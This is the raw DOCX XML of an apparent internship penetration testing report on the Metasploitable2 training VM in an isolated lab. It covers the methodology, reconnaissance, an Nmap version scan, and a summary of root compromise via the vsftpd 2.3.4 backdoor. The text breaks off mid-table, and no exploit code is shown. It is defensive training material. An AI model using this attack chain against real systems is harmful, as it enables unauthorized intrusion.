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1163E">
      <w:pPr>
        <w:spacing w:before="1600"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>PENETRATION TESTING REPORT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E6505F">
      <w:pPr>
        <w:spacing w:before="200" w:after="400"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="44546A"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Metasploitable2 Vulnerability Assessment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0E94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0B72DA6D">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Target System</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6850" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2AA6E5B8">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Metasploitable2 (192.168.56.106)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="248A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4674D0BF">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Attacker System</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6850" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="16B07803">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Kali Linux (192.168.56.101)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="35B7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1E85599F">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Environment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6850" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6371D6B5">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Isolated VirtualBox lab (host-only network)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2030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010F8A04">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Test Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6850" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0A7AAEFC">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>July 2-3, 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5A6E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0C80ED02">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Prepared By</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6850" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1EB87BF8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>Navya Bhatia</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="12E8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7C7F8E54">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Engagement Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6850" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5BCA0DC9">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>I</w:t>
            </w:r>
            <w:bookmarkStart w:id="0" w:name="_GoBack"/>
            <w:bookmarkEnd w:id="0"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>nternship Task</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="59BE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790D93D8">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Classification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6850" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7CC3D4BC">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Confidential – Internal Training Use Only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="75801D9D">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6273B67A">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>1. Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713474F4">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>This report documents a penetration test performed against Metasploitable2, an intentionally vulnerable Linux virtual machine used for security training. The engagement was carried out in an isolated VirtualBox lab environment as part of an internship task, with no production systems or external networks involved.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71AD50B1">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The assessment followed the standard methodology of Reconnaissance, Scanning, Exploitation, Post-Exploitation, and Reporting. During scanning, the target was found to expose an extensive set of vulnerable services. The engagement focused on a critical vulnerability in vsftpd 2.3.4, which contains a maliciously planted backdoor (CVE-2011-2523) allowing unauthenticated remote attackers to obtain a root shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EEB83D0">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Exploitation was successful: a root-level shell was obtained on the target system, and post-exploitation evidence was collected confirming full administrative compromise.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2257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Pr>
          <w:p w14:paraId="420FCE2D">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Metric</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
          </w:tcPr>
          <w:p w14:paraId="3314AB61">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="79BB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F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="430AB5E9">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Critical Vulnerabilities Exploited</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="19DD493C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>1 (vsftpd 2.3.4 Backdoor)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3C7E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FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="407411AA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Highest Privilege Obtained</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5B2FC60A">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>root (uid=0)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1E10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F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="534F4803">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Open Ports Identified</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="68AC30C8">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>23</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="12B7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FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="12EF4DEB">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Overall Risk Rating</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4AB519B6">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2BE130EE">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7C7A74">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>2. Penetration Testing Methodology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17AF3FF6">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The engagement followed a five-phase methodology:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE65792">
      <w:pPr>
        <w:pStyle w:val="16"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Reconnaissance – Identify the target and gather preliminary network information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2E6BFE">
      <w:pPr>
        <w:pStyle w:val="16"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Scanning – Enumerate open ports, running services, and versions using Nmap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32662AE1">
      <w:pPr>
        <w:pStyle w:val="16"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Exploitation – Identify and exploit a known vulnerability to gain unauthorized access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A19591B">
      <w:pPr>
        <w:pStyle w:val="16"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Post-Exploitation – Verify the level of access obtained and gather evidence of compromise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C7001C">
      <w:pPr>
        <w:pStyle w:val="16"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Reporting – Document findings, evidence, impact, and remediation guidance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71CAF24D">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>2.1 Objective</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15FC9391">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>To identify and exploit a known vulnerability present on the Metasploitable2 virtual machine, demonstrate real-world impact by obtaining a shell on the target, and document the full attack chain in a professional report.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30428377">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>3. Phase 1: Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4605F9F8">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The target was a known host on the internal lab network:</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31D9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36C79B77">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Target IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6850" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="133ED9DA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>192.168.56.106</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="17D2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41817355">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Attacker IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6850" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="34A33819">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>192.168.56.101 (Kali Linux)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="786E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25B34B7D">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6850" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="033FE389">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>VirtualBox Host-Only Adapter (isolated)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1B5A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5EB186B8">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Target OS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6850" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0AACDBC0">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Linux 2.6.24 (Ubuntu 8.04, i686) – Metasploitable2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5C0DEFFD">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Host discovery confirmed the target was live and reachable on the isolated lab network prior to scanning.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013B2747">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>4. Phase 2: Scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7857EC9B">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>A version-detection scan was run against the target using Nmap:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E47C9C5">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nmap -sV -T4 192.168.56.106</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56721457">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Key results: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300"/>
        <w:gridCol w:w="5650"/>
      </w:tblGrid>
      <w:tr w14:paraId="023B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tcPr>
          <w:p w14:paraId="3E47F723">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2300" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
          </w:tcPr>
          <w:p w14:paraId="23AD9504">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5650" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
          </w:tcPr>
          <w:p w14:paraId="2A3D6876">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3A39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2CC"/>
          </w:tcPr>
          <w:p w14:paraId="3CF4D27D">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>21/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2300" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC"/>
          </w:tcPr>
          <w:p w14:paraId="6D7046BE">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ftp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5650" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC"/>
          </w:tcPr>
          <w:p w14:paraId="0CEE9455">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>vsftpd 2.3.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="484A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Pr>
          <w:p w14:paraId="3548BDA3">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>22/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2300" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5047171A">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
